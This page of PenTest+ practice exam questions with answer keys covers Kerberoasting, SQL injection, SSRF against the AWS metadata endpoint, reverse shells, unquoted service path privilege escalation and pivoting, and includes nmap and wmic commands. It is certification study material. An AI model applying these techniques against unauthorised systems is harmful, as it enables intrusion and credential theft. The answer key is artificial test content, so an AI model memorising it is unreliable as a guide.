10 free, exam-style PenTest Plus (PenTest Plus) practice questions with answers and explanations. No signup required. Work through them below, then take the full free PenTest Plus practice test to study every exam domain.
During an internal penetration test of an Active Directory environment, a tester uses BloodHound and identifies several service accounts with Service Principal Names (SPNs) registered. The tester requests Kerberos TGS tickets for these accounts without sending any traffic to the service hosts themselves. Which attack is the tester performing?
Correct answer: C - Kerberoasting
A penetration tester runs the following command against a target network: nmap -sS -p- -T4 10.10.10.0/24 -oX results.xml Which of the following BEST describes what this command does?
Correct answer: B - Performs a SYN scan of all 65,535 ports with aggressive timing and saves output in XML format
A penetration tester submits a single quotation mark (') into a web application's search field and notices the page loads significantly slower than normal but returns no error messages or visible changes in the response content. The tester then submits a payload that causes a 10-second delay using a WAITFOR DELAY statement, which succeeds. Which type of SQL injection has the tester confirmed?
Correct answer: C - Time-based blind SQL injection
A penetration tester discovers a Server-Side Request Forgery (SSRF) vulnerability in a web application hosted on an AWS EC2 instance. The tester crafts a request that causes the server to query http://169.254.169.254/latest/meta-data/. What is the tester attempting to retrieve?
Correct answer: A - IAM role credentials attached to the instance
After running an authenticated vulnerability scan against a web server, the scanner reports a critical remote code execution vulnerability. The penetration tester manually attempts to exploit the finding using the exact CVE referenced but confirms that the server has already been patched. Which term BEST describes this scanner result?
Correct answer: D - False positive
A penetration tester has gained initial access to a Linux host inside a corporate network. The host's firewall blocks all inbound connections but allows outbound HTTP traffic. Which method should the tester use to establish an interactive shell?
Correct answer: B - Use a reverse shell that connects back to the tester's external listener
During the reconnaissance phase, a penetration tester queries certificate transparency logs, reviews the target's job postings on LinkedIn, and searches cached pages using the Wayback Machine. The tester has NOT sent any packets directly to the target's infrastructure. Which type of reconnaissance is being performed?
Correct answer: A - Passive reconnaissance
After completing a penetration test, a tester documents a step-by-step account of how an initial phishing email led to credential capture, lateral movement through SMB relay, and ultimately domain administrator access by exploiting a misconfigured certificate template. In which section of the final report does this documentation belong?
Correct answer: D - Attack narrative
A penetration tester gains standard user access on a Windows 10 workstation and runs the command: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" The output reveals a service with the path C:\Program Files\Internal App\update service\svc.exe running as SYSTEM. What should the tester attempt next?
Correct answer: D - Place a malicious executable at C:\Program.exe to exploit the unquoted path
A penetration tester compromises a dual-homed server that has one interface on the DMZ (10.0.1.0/24) and another on an internal network segment (192.168.50.0/24) not reachable from the tester's attack machine. The tester needs to run Nmap scans against hosts on the internal segment. Which approach is MOST appropriate?
Correct answer: C - Configure an SSH SOCKS proxy through the compromised host and route scans via Proxychains
Practice hundreds more PenTest Plus questions with instant scoring, weak-area drills, and full exam simulations.